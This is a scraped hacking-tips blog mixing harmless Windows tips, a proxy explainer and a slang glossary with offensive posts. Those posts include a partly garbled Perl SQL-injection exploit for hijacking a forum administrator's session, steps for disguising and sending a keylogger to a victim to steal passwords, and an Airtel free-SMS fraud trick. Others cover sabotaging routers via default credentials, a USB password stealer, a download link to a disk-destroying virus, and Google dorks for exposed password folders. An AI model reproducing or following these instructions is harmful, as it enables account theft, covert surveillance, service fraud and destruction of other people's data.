Create One-Click Shutdown and Reboot Shortcuts

his is really very easy one but very effective one. Enjoy it! First, create a shortcut on your desktop by right-clicking on the desktop, choosing New, and then choosing Shortcut. The Create Shortcut Wizard appears. In the box asking for the location of the shortcut, type shutdown. After you create the shortcut, double-clicking on it will shut down your PC.

But you can do much more with a shutdown shortcut than merely shut down your PC. You can add any combination of several switches to do extra duty, like this:

shutdown -r -t 01 -c “Rebooting your PC”

Double-clicking on that shortcut will reboot your PC after a one-second delay and display the message “Rebooting your PC.” The shutdown command includes a variety of switches you can use to customize it.

I use this technique to create two shutdown shortcuts on my desktop—one for turning off my PC, and one for rebooting. Here are the ones I use:

shutdown -s -t 03 -c “Bye Bye m8!”

shutdown -r -t 03 -c “I ll be back m8 ;)!”

Switch

What it does

-s

Shuts down the PC.

-l

Logs off the current user.

-t nn

Indicates the duration of delay, in seconds, before performing the action.

-c “messagetext”

Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation marks.

-f

Forces any running applications to shut down.

-r

Reboots the PC

Read More

Anonymity of a Proxy Server Explained

How does Proxy Server Works ?

This is the First Question that arises in our mind when we use the Proxy Servers for Surfing the Internet without revealing our Identity to Others. Here all these mindboggling questions are answered with easy to understand examples.

The exchange of information in Internet is made by the “client - server” model. A client sends a request (what files he needs) and a server sends a reply (required files). For close cooperation (full understanding) between a client and a server the client sends additional information about itself: a version and a name of an operating system, configuration of a browser (including its name and version) etc. This information can be necessary for the server in order to know which web-page should be given (open) to the client. There are different variants of web-pages for different configurations of browsers. However, as long as web-pages do not usually depend on browsers, it makes sense to hide this information from the web-server.

What your browser transmits to a web-server:

• name and a version of an operating system


• name and a version of a browser


• configuration of a browser (display resolution, color depth, java / javascript support, …)


• IP-address of a client


• Other information

The most important part of such information (and absolutely needless for a web-server) is information about IP-address. Using your IP it is possible to know about you the following:

• country where you are from


• city


• your provider?s name and e-mail


• your physical address

Information, transmitted by a client to a server is available (accessible) for a server as environment variables. Every information unit is a value of some variable. If any information unit is not transmitted, then corresponding variable will be empty (its value will be undetermined).

These are some environment variables:

REMOTE_ADDR ? IP address of a client

HTTP_VIA ? if it is not empty, then a proxy is used. Value is an address (or several addresses) of a proxy server, this variable is added by a proxy server itself if you use one.

HTTP_X_FORWARDED_FOR ? if it is not empty, then a proxy is used. Value is a real IP address of a client (your IP), this variable is also added by a proxy server if you use one.

HTTP_ACCEPT_LANGUAGE ? what language is used in browser (what language a page should be displayed in)

HTTP_USER_AGENT ? so called “a user?s agent”. For all browsers this is Mozilla. Furthermore, browser?s name and version (e.g. MSIE 5.5) and an operating system (e.g. Windows 98) is also mentioned here.

HTTP_HOST ? is a web server?s name

This is a small part of environment variables. In fact there are much more of them (DOCUMENT_ROOT, HTTP_ACCEPT_ENCODING, HTTP_CACHE_CONTROL, HTTP_CONNECTION, SERVER_ADDR, SERVER_SOFTWARE, SERVER_PROTOCOL, …). Their quantity can depend on settings of both a server and a client.

[eminimall]

These are examples of variable values:

REMOTE_ADDR = 194.85.1.1

HTTP_ACCEPT_LANGUAGE = ru

HTTP_USER_AGENT = Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

HTTP_HOST = www.webserver.ru

HTTP_VIA = 194.85.1.1 (Squid/2.4.STABLE7)

HTTP_X_FORWARDED_FOR = 194.115.5.5

Anonymity at work in Internet is determined by what environment variables “hide” from a web-server.

If a proxy server is not used, then environment variables look in the following way:

REMOTE_ADDR = your IP

HTTP_VIA = not determined

HTTP_X_FORWARDED_FOR = not determined

According to how environment variables “hided” by proxy servers, there are several types of proxies

Transparent Proxies

They do not hide information about your IP address:

REMOTE_ADDR = proxy IP

HTTP_VIA = proxy IP

HTTP_X_FORWARDED_FOR = your IP

The function of such proxy servers is not the improvement of your anonymity in Internet. Their purpose is information cashing, organization of joint access to Internet of several computers, etc.

Anonymous Proxies

All proxy servers, that hide a client?s IP address in any way are called anonymous proxies

Simple Anonymous Proxies

These proxy servers do not hide a fact that a proxy is used, however they replace your IP with its own:

REMOTE_ADDR = proxy IP

HTTP_VIA = proxy IP

HTTP_X_FORWARDED_FOR = proxy IP

These proxies are the most widespread among other anonymous proxy servers.

Distorting Proxies

As well as simple anonymous proxy servers these proxies do not hide the fact that a proxy server is used. However a client?s IP address (your IP address) is replaced with another (arbitrary, random) IP:

REMOTE_ADDR = proxy IP

HTTP_VIA = proxy IP

HTTP_X_FORWARDED_FOR = random IP address

High Anonymity Proxies

These proxy servers are also called “high anonymity proxy”. In contrast to other types of anonymity proxy servers they hide a fact of using a proxy:

REMOTE_ADDR = proxy IP

HTTP_VIA = not determined

HTTP_X_FORWARDED_FOR = not determined

That means that values of variables are the same as if proxy is not used, with the exception of one very important thing ? proxy IP is used instead of your IP address.

Summary

Depending on purposes there are transparent and anonymity proxies. However, remember, using proxy servers you hide only your IP from a web-server, but other information (about browser configuration) is accessible!

Read More

How to Hack into forums

This is what you like to call “Hacking a forum”.

I call it “Cracking into a forum” … Learn what hacking means you, lol…

PS: I am hacking a forum slowly, everything i am doing now, is posted here by steps :

First of all, what you need is a forum to hack. For the sake of this tutorial, and for the safety of a specific site, I will not release the URL of the site that I will be hacking in this. I will be refering to it as “hackingsite”.

So you’ve got your target. You know the forum to want to hack, but how? Let’s find the user we want to hack. Typically, you’d want to hack the admin. The administrator is usually the first member, therefore his/her User ID will be “1″. Find the User ID of the administrator, or person you wish to hack. For this tutorial, let’s say his/her ID is “2″.

Got it? Well, now we are almost all set. So far, we know the site we wish to hack, and the member we wish to hack. In this case, we are hacking the administrator of “hackingsite”, which is User ID “2″.

Now we need a nice exploit. I preferably, for 1.3.1 forums, use one that is in common circulation around these forums. For those who don’t have it, here:

CODE

#!/usr/bin/perl -w

##################################################################

# This one actually works Just paste the outputted cookie into

# your request header using livehttpheaders or something and you

# will probably be logged in as that user. No need to decrypt it!

# Exploit coded by “ReMuSOMeGa & Nova” and http://remusomega.com

##################################################################

use LWP::UserAgent;

$ua = new LWP::UserAgent;

$ua->agent(”Mosiac 1.0″ . $ua->agent);

if (!$ARGV[0]) {$ARGV[0] = ”;}

if (!$ARGV[3]) {$ARGV[3] = ”;}

my $path = $ARGV[0] . ‘/index.php?act=Login&CODE=autologin’;

my $user = $ARGV[1]; # userid to jack

my $iver = $ARGV[2]; # version 1 or 2

my $cpre = $ARGV[3]; # cookie prefix

my $dbug = $ARGV[4]; # debug?

if (!$ARGV[2])

{

print “..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n\n”;

exit;

}

my @charset = (”0″,”1″,”2″,”3″,”4″,”5″,”6″,”7″,”8″,”9″,”a”,”b”,”c”,”d”,”e”,”f”);

my $outputs = ”;

for( $i=1; $i < j=”0;” current =” $charset[$j];” sql =” (” cookie =” (’Cookie’”> $cpre . “member_id=31337420; ” . $cpre . “pass_hash=” . $sql);

my $res = $ua->get($path, @cookie);

# If we get a valid sql request then this

# does not appear anywhere in the sources

$pattern = ”;

$_ = $res->content;

if ($dbug) { print };

if ( !(/$pattern/) )

{

$outputs .= $current;

print “$current\n”;

last;

}

}

if ( length($outputs) < member_id=” . $user . ” pass_hash=”">

What the fuck,Pretty confused, aren’t you? What the fuck are you supposed to do with this shit?! I’ll tell you. First of all, this is a Perl script.

Read More

Installing a Keylogger on a Remote Machine

Note: This article is for educational purpose only and the author won’t be responsible for any kind of damage caused by following the information given in this article.

Now to install a Keylogger on a Remote Computer you have to follow the steps given below:

1. First of all download Winspy keylogger software from link given below:
   
   

   http://www.win-spy.com/



2. After downloading this software, run the .exe. You will be asked to register yourself where you will be asked to enter a Userid and Password. Remember this password as it will be required in uninstalling the software.


3. Now, another box will come, explaining you the hot keys(Ctrl + Shift + F12) to start the Winspy keylogger software.


4. Now, on pressing hot keys, a login box will come asking userid and password. Enter them and click OK.


5. Now, Winspy’s main screen will be displayed as shown in image below:


6. Select Remote at top, then Remote install.


7. On doing this, you will get a popup box as shown in image. Now, fill in the following information in this box.
   
   

   User - type in the victim’s name
   
   File name - Name the file to be sent. Use the name such that victim will love to accept it.
   
   File icon - Keep it the same
   
   Picture - select the picture you want to apply to the keylogger.
   
   Email keylog to - Enter your Email address. Hotmail and Yahoo doesnot accept Keylog Files so enter other email address.
   
   Thats it. This much is enough. If you want, can change other settings also.



8. After you have completed changing settings, click on “Create Remote file”. Now just add your picture to a winrar archive. Now, what you have to do is only send this keylog file to your victim. When victim will open this file, all keystrokes typed by victim will be sent to your email inbox. Thus, you will get all his passwords and thus will be able to hack his email accounts and even Myspace account password.

So guys, I hope you have got the trick on how to hack any email account passwords from this article. If you have any comment or views about article, feel free to mention it in comments section.

Read More

Airtel Hack 2009 for Unlimited Free SMS

Many people search for free Airtel message center number to start sending unlimited messages without paying for them. Well, previously many websites made posts on these free message center numbers, but after the frequent use of the number, Airtel capped or filtered those numbers from further use. But still there are few working message center numbers and here I am going to reveal that with you. Note that Airtel might ban this number anytime, so be fast in using this and send free sms to anyone from your Airtel mobile number.

How to send unlimited free SMS using free SMS center no hack

1. Navigate to Messages option on your mobile and click on Settings


2. Click on Message Center Number and proceed to add a new message center number.


3. In Message Center Name field, write anything. For an example, “crack to hack”.


4. In the Message Center Number field, write +919810051905


5. Choose Preferred Connection Type as Packet Data


6. Save the message center and activate it from the options.

Now we have configured the message settings to send and receive all message through an another message center number. But since we have selected Packet data as connection type, we have to do some additional settings on our phone.

1. Go to your phone menu and navigate to Settings >> Phone Settings >> Connection >> Packet Data


2. In the settings of packet Data, edit the following options


3. Packet Data Connection >> When available and Access Point >> Airtel Live


4. Save all settings and you are done.

Note: Here we are using a CDMA message center number to send free messages from Airtel mobile. Since CDMA networks don’t support 91 as the country code, you have to add 0 before every number. This is very important and if you make mistake here, this trick will not work.

Example : Suppose you want to send free messages to 9861098610, now while composing the SMS, type this number as 09861098610 in stead of 919861098610 or +919861098610.

And also, message center number settings option may vary from phone to phone. The above steps are mentioned for Nokia mobile phones. If you want to try sending free SMS from any other handset, use your mobile manual and set the new message center number accordingly.

Read More

Windows 7 Cheat Sheet

From Desktop

1. Windows Key + Tab : Aero [press Tab to cycle between Windows]


2. Windows Key + E : Windows Explorer is launched.


3. Windows Key + R : Run Command is launched.


4. Windows Key + F : Search (which is there in previous Windows versions too)


5. Windows Key + X : Mobility Center


6. Windows Key + L : Lock Computer (It is there from the earlier versions as well)


7. Windows Key + U : Launches Ease of Access


8. Windows Key + P : Projector


9. Windows Key + T : Cycle Super Taskbar Items


10. Windows Key + S : OneNote Screen Clipping Tool [requires OneNote]


11. Windows Key + M : Minimize All Windows


12. Windows Key + D : Show/Hide Desktop


13. Windows Key + Up : Maximize Current Window


14. Windows Key + Down : Restore Down / Minimize Current Windows


15. Windows Key + Left : Tile Current Window to the Left


16. Windows Key + Right : Tile Current Windows to the Right
    
    [Continue pressing the Left and Right keys to rotate the window as well]


17. Windows Key + # (# is any number) : Quickly Launch a new instance of the application in the Nth slot on the taskbar. Example Win+1 launches first pinned app, Win+2 launches second, etc.


18. Windows Key + = : Launches the Magnifier


19. Windows Key + Plus : Zoom in
    
    


20. Windows Key + Minus : Zooms out


21. Windows Key + Space : Peek at the desktop

From Windows Explorer

22. Alt + Up : Go up one level

23. Alt + Left/ Right : Back/ Forward

24. Alt + P : Show/hide Preview Pane

Taskbar modifiers

25. Shift + Click on icon : Open a new instance

26. Middle click on icon : Open a new instance

27. Ctrl + Shift + Click on icon : Open a new instance with Admin privileges

28. Shift + Right-click on icon : Show window menu (Restore / Minimize / Move / etc). Note: Normally you can just right-click on the window thumbnail to get this menu.

29. Shift + Right-click on grouped icon : Menu with Restore All / Minimize All / Close All, etc.

30. Ctrl + Click on grouped icon : Cycle between the windows (or tabs) in the group

Though some of them are there in previous versions of Windows, Windows 7 has incorporated many of them and have started many afresh.

Read More

Disguise as GoogleBot to view Hidden Content of a Website

Ever experienced this? You ask Google to search something and it will return a lot of relevant results, but if you try to open the ones with the most promising content, you are confronted with a registration page instead, and the stuff you were looking for will not be revealed to you unless you agree to a credit card transaction first. This means that Google is able to see what a normal netizen cannot see.

The reason behind this is that Google uses a Bot called GoogleBot and most of websites which force users to register or even pay in order to search and use their content, leave a backdoor open for the GoogleBot because a prominent presence in Google searches is known to generate sales leads, site hits and exposure. Examples of such sites are Expert-Exchange, Windows Magazine, .Net Magazine, Nature, and many other sites around the globe.

What if you could disguise as GoogleBot then you can also see what GoogleBot can.

How to Disguise as GoogleBot?

It is Quite simple. You just need to change your browser’s User Agent. To change your Browser’s User Agent follow the steps given below:

• Copy the following code segment into a notepad file and save it as Useragent.reg or you may also download it.
  
  

  Windows Registry Editor Version 5.00
  
  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
  
  @=”Googlebot/2.1″
  
  “Compatible”=”+http://www.googlebot.com/bot.html”



• Now Double-Click on the file Useragent.reg to merge the registry file into your Windows Registry.


• Now Restart your computer. This is required to apply the changes made into the Registry.


• Voila! You’re done! Now you have become GoogleBot.

How Revert back to Normal Agent?

• For IE users : To restore the IE User Agent, Follow the Given Steps Below:
  • Copy the following code segment into a notepad file and save it as Normalagent.reg or you may also download it:
    
    

    Windows Registry Editor Version 5.00
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
    
    @=”Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”

  
  
  • Now Double-Click on the file Normalagent.reg to merge the registry file into your Windows Registry.
  
  
  • Now Restart your computer. This is required to apply the changes made into the Registry.
  
  


• For Opera Users : Opera allows on-the-fly for switching of User Agents through its “Browser Identification” function.


• For Firefox users : Just download User Agent Switcher extension for Firefox.
  • Now Goto Tools -> User Agent Switcher -> Options -> Options.
  
  
  • Click “User Agents”
  
  
  • Click ” Add” and fill the following information  in the form
    • Description: Googlebot
    
    
    • User Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    
    
    • App Name: Googlebot
    
    
    • App Version: 5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    
    
    • Platform: +http://www.google.com/bot.html
    
    
    • Vendor:
    
    
    • Vendor Sub:
    
    
  
  
  • Click “OK”.
  
  
  • Now you may change the user agent on the fly.

Read More

Accessing the Router

Your tricks and tweaks based on your experiences teaches you many thing,like the one I’m going to mention now

Well the last Post by Manav, forces me to publish this article.

How to Access a router and what can you do after it ?

I’ve been doing this from past few months, and I when Manav said that it is a global problem, I feel to appreciate him for that.

Okei, so here we go,

There are actually two methods

1. Manual (I love this)


2. Remote (I still love this)

But before just illustrating the trick, I’d like to introduce some thing to you all. A router is a device that connects with the Lan Card/Ethernet or with the USB port of your computer, it is a gateway of your computer to the outside world.

It is assumed that with the introduction of router, direct access to your computer, which was possible in the Dial UP reign, is now abolished, but in this world nothing is safe, so we’ll see.

Manual Method

The Router and the computer make a small local Area Network.

There are different IP addresses for different devices/nodes in the LAN, normally the range starts from 192.168.1.1, you can check out your node’s IP, by viewing the properties of the Network Connection (if its connected).

Now, normally the router or the server (if in a larger network ), has the local IP 192.18.1.1. You can always access the configuration page, by visiting the local IP 192.168.1.1 , type this IP address on any web browser.

This will lead you to the configuration page, where it will ask you for the user name and password, see the snapshot



Now, here lies the biggest flaw of the global aspect, try this useername : admin, password :: admin, try this it will workin 95% cases, why ?, because even the IT gurus are n00bs enough for never looking in this problem, Its a global situation, from Japan to Pakistan.

So here you are in the Configuration page , now even if the password is not admin, and you’ve physical access to the router, just reset it, all it need is a pin

In the Remote Method, all you need to know is the IP of the router, no local IP won’t get you to anybody’s router, so you need to know the IP when he is connected, there are so many methods, I’ll have a separate post for that.

Now the Question lies, what Can I do for fun ?

The most obvious thing that you can do is “trouble him/her”, how ?, well just navigate through the configuration pages, to find something like “Internet Connection “, It list the connections, see the snapshot



Now this is your work, out of the given list only one will be active, which one?, most probably the top one, edit it, change the VPI and VCI value, hola, you’re done, this trick will atleast trouble him for 2-3 days. And beside you can change many other things, that I leave on you !



In certain Router, it is even possible to get the username of the Internet Connection and the password of the connection in hidden form, but everybody knows that the password is there, and since you’ve access to the PHP page you can get the damn password out,for example see this snap



What else can I do ?, well I’ven’t tried it but lets see, the router and the computer interacts by using a port, which port ? , we don’t know, it can be any of those 65000 ports, so running a port scanner ( you’ll find many ) is an advisable thing, go ahead and let me know !

Read More

Perfect Keylogger undetectable. with key Gen

BlazingTools Perfect Keylogger with key Gen Perfect Keylogger is a remote covert surveillance tool made for everybody! With this key logger you can receive their keystrokes, IM chats, websites, screenshots and passwords by email. Covert remote surveillance - as easy as never before! Some applications of the keylogger: parental control; stealth monitoring of your spouse, internet friends etc. It is virtually undetectable

Download

Read More

Restore Task Manager, Regedit and Folder Options Disabled by Virus

Let’s face it. All of us have been infected by virus before. Even if you have anti-virus installed, you can still be infected by a new or custom virus that is not recognized by your anti-virus. Sometimes after removing the virus completely from our system, you’ll face new problems such as you can no longer bring up Windows Task Manager from CTRL+ALT+DEL. You get the error message saying “Task Manager has been disabled by your administrator”….



You think that it’s easy to fix this problem by going to Registry Editor but you can’t! You get the error message “Registry editing has been disabled by your administrator”.



Folder Options and even Show Hidden Files & Folder is disabled! How frustrating! Don’t worry, here’s how to restore your Windows Task Manager, Registry Editor, Folder Options and Show hidden files & folders.

This problem is most commonly caused by a virus called “Brontok”. Brontok virus will make some changes to the system restrictions in order to hide itself from easy detection and also from easy cleaning.

Here’s a free tool called Remove Restrictions Tool (RRT) which is able to re-enables all what the virus had previously disabled, and gives you back the control over your own computer.



Remove Restrictions Tool is able to re-enable:

- Registry Tools (regedit)

- Ctrl+Alt+Del

- Folder Options

- Show Hidden Files

Small and easy to use. Make sure you boot in to Safe Mode to use Remove Restrictions Tool (RRT). Just click on the buttons and it’ll do it’s job.



Click Here to download

Read More

USB Password Stealer

Tweaked USB that steals every passwords including licences.

Instructions

1.Decompress the archive and put all the files located in the folder “USBThief”into a USB.

2.Insert the USB in your victim’s computer.

3.View folder “dump” to see the passwords.

Download

Password: www.dl4all.com

Read More

Database to the Virus

The Complete Database to the virus has been uploaded, open the link to download the zipped file

Its a silent killer, kills your hard-disk, and it schedules itself using

mount points, one of the rarest cases

http://ankit-cracker.zoomshare.com/files/VM/ekugb.bat.zip

Read More

How to see Rapidshare Folders of Users

rapidshare.com/users/xxxxx

where a collection of files can be seen. But the question is that how to find such links? Well google will help you in this

But how?

Use following keywords in google to see all rapidshare folders available on internet

site:rapidshare.com inurl:users “*”

site:rapidshare.de inurl:users “*”

site:rapidshare.com inurl:files “*”

site:rapidshare.de inurl:files “*”

site:rapidshare.com inurl:users (pass|password)

site:rapidshare.de inurl:users (pass|password)

Suppose u need some info on hacking.Then u can try following keywords to see all rapidshare folders having any hacking related thing in it

site:rapidshare.com inurl:users “hack”

site:rapidshare.com inurl:users “hacking”

And get you desired file/folder whatever you need. No need of any rapidshare search engine. Google will do everything for you

Read More

Different Internet Slangs And Phrases -Internet Slangs Dictionary

0-9

1337 (written in ASCII) - From the word Leet, derived from the word elite

2 - too, or to

4 - For

A

AFAICR/S/T - As far as I can recall / remember / see / tel

AFAIK - As far as I know

AFK - Away from keyboard

ANFSCD - And Now For Something Completely Different. Used to change the subject of conversation.

ASAP - As soon as possible

ASL - Age / sex / location

ATEOTD - At The End of the Day

ATM - At the moment

AWOL - Absent Without (Official) Leave

AYBABTU (also abbreviated as AYB) - All your base are belong to us (from the video game Zero Wing)

B

B2B - Business to Business

B& and/or B7- Banned

BBIAB - Be back in a bit

BBL/S - Be back later / shortly / soon

BCNU - Be seein’ you

Blog - Also known as web log or an online journal

BOFH - ~censored~ operator from hell

Bot - Any type of automated software in chatrooms and web-cataloging software

BRB - Be right back

BSOD - Blue Screen of Death

BTDT - Been there done that

BTW - By the way

Bump - Increment (For example, C’s ++ operator.)or a backronym for “Bring Up My Post”

C

Crawl - To retrieve a web page along with the hyperlinks that reference it

Crapplet - A poorly written computer application

CU - See you (later)

CYA - See ya OR Cover Your Ass

Cyber (prefix) - A term used to connect the subsequent word loosely to the world of computers or the Internet or sex over a computer

Cyberspace - Virtual reality, the Internet, the World Wide Web, and other kinds of computer systems. Science fiction author William Gibson popularized the term in his novel Neuromancer. Gibson used the word to describe a virtual world of computer networks that his cyberpunk heroes ‘jacked into’

D

DFTT - Don’t feed the trolls

DGAF - Don’t Give A ~censored~

DIAF - Die in a fire

DILLIGAF/D/S - Does it look like I give a flip / ~censored~ / damn / shit

DND - Do not disturb

DOA - Dead on arrival. Refers to hardware that is broken on delivery.

E

EOF - End Of File

EOM - End of Message

EOL - End of Life. Device or hardware that is at the end of its product life cycle.

EQ - EverQuest

ETA - Estimated time of arrival

F

FAQ - Frequently Asked Question(s)

FFS - For ~censored~’s sake

Flamer - Someone who makes inflammatory, abusive or directly offensive comments. Similar to, but not quite the same as an Internet troll[3]

FMCDH - From My Cold Dead Hands

FOAD - ~censored~ off and die

FOAF - Friend of a friend

FTL - For the loss

FTW - For the win

FU - ~censored~ you

FUBAR - ~censored~ up beyond all recognition / repair (from military slang; pronounced “foo-bar”)

FUD - Fear, Uncertainty and Doubt (the purposeful spread of misinformation)

FWIW - For what it’s worth

FYI - For your information

G

GBTW - Get back to work

GF - Great/good fight/girlfriend

GFU - Good for you

GFY - Go ~censored~ yourself

GG - Good game, used at or near the conclusion of a gaming match

GJ - Good job, often used in online gaming when a teammate performs an act benefitting his team, such as killing an opponent or enabling that kill

GMTA - Great minds think alike

Godwin’s Law - Dictates that the longer a thread, the more likely someone will post a comparison involving Nazis or Hitler

Gratz - Congratulations

GTFO - Get the ~censored~ out

GTG or G2G - ‘Got to go’ or ‘Good to go’

GR -Good Race

GR8 - Great

H

HAND - Have A Nice Day

Handle - Name used in online chat, (AKA nick(name), alias, screen/user name)

HF - Have fun

Haxor or H4×0r (1337) - Hacker

Hit - A request made to the web server, (noun) the results of an internet search, (verb) loading a Web page. Hits are not equivalent to visitors of a webpage.

Home page - The website’s introduction page, starting point, and guide. The technical term is “index”

Hot list - A collection of publicly available URLs (World Wide Web site addresses), sometimes available as text files.

HTH - Hope this / that helps

H8 - Hate

I

IANAL - I am not a lawyer

IBTL - In before the lock

IDC - I don’t care

IDK - I don’t know

IIRC - If I recall / remember correctly

IIUC - If I understand correctly

IMO/IMHO/IMNSHO/IMAO - In my (humble / honest / not so humble / arrogant) opinion

Information superhighway - The Internet (AKA: I-way, infobahn)

IONO - I don’t know

IOW - In other words

IRC - Internet Relay Chat

IRL - In real life

ITYM - I Think You Mean

IWSN - I want sex now

IYKWIM - If you know what I mean

J

Jaggy - Aliased computer graphics

JK or j/k - Just kidding, or joke

JFGI - Just ~censored~/Freaking Google It

K

k or kk - OK

KISS - Keep it simple stupid.

KS(ing) - Kill-Steal(ing)

KOS - Kill on sight

KTHX - OK, thanks

KTHXBAI or KTHXBYE - OK, thanks, goodbye, used either to cut short a conversation or to express displeasure with being cut short

L

L2P - Learn to play; an admonishment to MMORPG players who are incompetent and/or whine

L8R - Later, L8R also sometimes abbreviated as L8ER is commonly used in chat rooms and other text based communications as a way of saying good bye.

Lag - Slang term for slow Internet speeds or high Internet latency; Lag is sometimes due to a server problem, but more frequently due to the connection between client and server. A slow or intermittent connection may often be referred to as laggy

Lamer - A know-nothing, one who is lame.

Leet - Often spelled as l33t or 1337 in ASCII form. It originally meant elite

LFG - Looking for group

LFM - Looking for more

LM(F)AO - Laughing my (frigging) ass off

LMIRL - Let’s meet in real life.

LMK - Let me know

LOL - Laughing out loud, laugh out loud

LTNS - Long time no see

Lurker - Someone who frequents a Usenet group without participating in discussions

M

MMORPG, MMO - Massive Multi-player Online Role Playing Game

MMOFPS - Massive Multi-player Online First Person Shooter

MOTD - Message of the day

MS - MapleStory, an MMORPG

MTFBWY - May The Force be with you

MUD - Multi-User Dungeon

MUSH - Multi-User Shared Hallucination

MYOB - Mind your own business

M8 - Mate

N

NE1 - “Anyone”

NFI - “No ~censored~ Idea”

Newbie, noob, or n00b - An inexperienced user of a system or game,or an annoying person.

NIFOC - Naked In Front Of Computer

NM - (Sometimes written N/M) Not much, Never mind or no message, used on message boards or in e-mails to indicate that everything is already said in the subject line.

NP - No problem

NSFW - Not safe for work. Warning about content that may get the viewer in trouble with his employer or co-workers.

NVM, NVMD, or nm - Nevermind, not much

O

O RLY - Oh really?

OIC - Oh, I see

OFN - Old ~censored~ news

OMG - Oh my god

OMFG - Oh my ~censored~ god

OMW - On my way or Oh my word

OP - Original poster / Operator / Outpost

OS - Operating system

OT - Off topic

OTOH - On the other hand

OTP - On the phone or One true pairing

P

P2P - Peer to peer, or pay to play

PAW - Parents are watching

PEBKAC/PEBCAK - Problem exists between keyboard and chair

Ping - From the popular network monitoring tool, used as a greeting similar to “Are you there?”.

PITA - Pain in the arse / ass

PLMK - Please let me know

PMSL - Pissing myself laughing

POS - Piece of shit, or parent over shoulder.

POTS - Plain old telephone service

POV - Point of view

PPL - People

PTKFGS - Punch the Keys For God’s Sake

pr0n - Intentional misspelling of porn

PW - Persistent World (gaming)

pwned - Intentional misspelling of owned

Q

QFT - Quoted for truth. Used on internet message boards to show agreement from a previous message

R

Rehi (or merely re) - Hello again

RL - Real Life[3]

RO(T)FL - Rolling on (the) floor laughing

RO(T)FLMAO - Rolling on (the) floor laughing my ass off

RO(T)FLOL - Rolling on (the) floor laughing out loud

RSN - Real soon now (used sarcastically)

RTFB - Read the ~censored~ binary (or book)

RTFS - Read the ~censored~ source

RTFM/RTM - Read the (~censored~) manual

S

SCNR - Sorry, could not resist

sk8/sk8r - skate/skater

Smiley - Another name for emoticons

SMH - Shaking my head

SNAFU - Situation normal: all (~censored~/[3]fouled) up

Snail mail - Normal paper mail service

SOHF - Sense of humor failure

Spider - The program behind a search engine

STFU - Shut the ~censored~ up

STFW - Search the ~censored~ web

T

TANSTAAFL - There ain’t no such thing as a free lunch

TBF - Time between failures

TBH - To be honest

TG - That’s great

TGIF - Thank god it’s Friday

TH(N)X, TNX or TX - Thanks

TIA - Thanks in advance

TINC - There Is No Cabal, a term discouraging conspiracy theories

TMI - Too much information

TOS - Terms of service

TTBOMK - To the best of my knowledge

TTFN - Ta ta for now

TTT - To the top, used in forums to bump a thread

TTYL - Talk to you later (also spelled TTUL, T2UL or T2YL)

TTYTT - To Tell You The Truth

Tweedler - One who has deep love for all computer related technology and gadgets

TWIMC - To Whom It May Concern

TY - Thank you

TYT - Take your time

TYVM - Thank you very much

U

U - You

UTFSE - Use the ~censored~ search engine

V

W

w00t, w00T or WOOT - First two express exuberance, the latter is a backronym for the term “We Own the Other Team”.

W/ or W/O - With or without

WB - Welcome back

W/E - Whatever

WRT - With respect / regard to

WTB - Want to buy

WTF - What the ~censored~

WTG - Way to go

WTH - What the hell

WTS - Want to sell

WTT - Want to trade

WUG - What you got?

WoW - World of Warcraft (game)

WUBU2 - What (have) you been up to?

WUU2 - What (are) you up to?

WYSIWYG - What you see is what you get

W8 - Wait

W-BB WarezBB

W-BB WarezBB

Y

YARLY - Yeah Really

YHBT - You have been trolled

YKW - You know what?

YMMV - Your mileage may vary.

YTMND - You’re The Man Now, Dog

YW - You’re welcome.

YOYO- You’re On Your Own.

Z

ZOMG - An intentional misspelling of the acronym shorthand for “Oh My God/Gawd” and pronounced “Zoh My God/Gawd” This version is mainly used in jest or to ridicule people who use abbreviations like OMG and OMFG

Read More

Firefox Customization

Windows only: After we wrote about the All-Glass Firefox theme, reader bc//G_A wrote in with an even more impressive customization that enables the Aero Glass effect across almost every UI element.

Enabling the complete glass look requires more than a few steps—you'll need to install the Glasser extension, the Stylish extension, a number of user styles, and another extension to fix up the font colors. All of the instructions for setting up the glass theme can be found in the DeviantART guide, but the glass menus in the screenshot are thanks to the userstyles.org link sent in by reader Scott. Readers should note that the glass menus are a little buggy, and the overall style hides a lot of UI elements you might be used to, so while it's not for everybody it's an interesting customization worth a look for those serious about tweaking their browser.

You'll need to be running the latest beta of Firefox under Windows 7 or Vista to be able to use the glass menus, but you can install an older version of Glasser and use the rest of the glass effects. For more, check out All-Glass Firefox, or take a look at the more productive Aero Geek customization.

Read More

Bing is the name of Microsoft’s new search engine that expected to go live sometime next week. You can find overview documents and screenshot images of Bing here while of video tour of the Bing.com service is available here.

You probably didn't wake up today expecting an entirely new search experience.

But — Bing! — here it is.

So, why a new search engine? Why the new name? Why now?

Well, because even though search is a pretty amazing thing, the current state of search engines has some equally amazing statistics.

So far in 2009, there are four and a half websites created EVERY SECOND as the web continues to expand. While more searchable information is cool, nearly half of all searches don’t result in the answer that people are seeking.

At the same time, the way the world searches is changing. You want more than just information. You want knowledge that leads to action.

The truth is you've evolved. It's time search caught up.

So we had an idea. Start over. And we did.

We took a new approach to go beyond search to build what we call a decision engine. With a powerful set of intuitive tools on top of a world class search service, Bing will help you make smarter, faster decisions. We included features that deliver the best results, presented in a more organized way to simplify key tasks and help you make important decisions faster.

And features like cashback, where we actually give you money back on great products, and Price Predictor, which actually tells you when to buy an airline ticket in order to help get you the best price — help you make smarter decisions, and put money back in your pocket.

We sincerely hope that the next time you need to make an important decision, you'll Bing and decide.

Thank you,

Bing Team, Microsoft

Read More

Send Ad Free SMS with your own Name as sender

Today, I got to know about a great service which lets you to Send Free SMS over 10 countries<. You don’t need to sign up. Your SMS will arrive guaranteed and there are no annoying ads also. The message can have upto 160 characters.



Cool Features:

• Free SMS


• No sign up required


• Messaging to 10 countries, including India


• Ad free messaging


• Display your own number in the sender


• Secured by Captcha

Read More

Hackers Temporarily Seize Control Of Google Morocco Domain Name

